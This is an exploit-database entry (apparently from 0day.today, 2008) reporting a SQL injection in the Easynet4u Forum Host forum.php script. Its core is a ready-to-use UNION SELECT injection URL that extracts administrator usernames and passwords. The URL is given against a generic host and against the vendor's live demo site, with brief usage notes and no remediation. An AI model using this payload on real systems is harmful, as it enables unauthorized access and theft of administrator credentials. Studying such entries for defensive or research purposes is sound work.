Easynet4u Forum Host (forum.php) SQL Injection Vulnerability

2008-10-10T00:00:00
ID 1337DAY-ID-3870
Type zdt
Reporter SuB-ZeRo
Modified 2008-10-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Easynet4u Forum Host (forum.php) SQL Injection Vulnerability
============================================================


############### >>> Remote SQL Injection <<<  #########
##    SuB-ZeRo  CoNsTaTiNe HaCkErS25 walid          ##
################## >>> SuB-ZeRo  <<< ################
 author  :  SuB-ZeRo
                
 scrit: forumhost
 buy script : http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=forum_host
 dork       : find it
 exploit:
 www.site.me/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin--
 NoTe:in name of demo put eny user you want
 L!Ve DeMo
 http://www.easynet4u.com/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin--
 NoTe:YoU must singup and login in web sit and you put your exploit



#  0day.today [2018-03-19]  #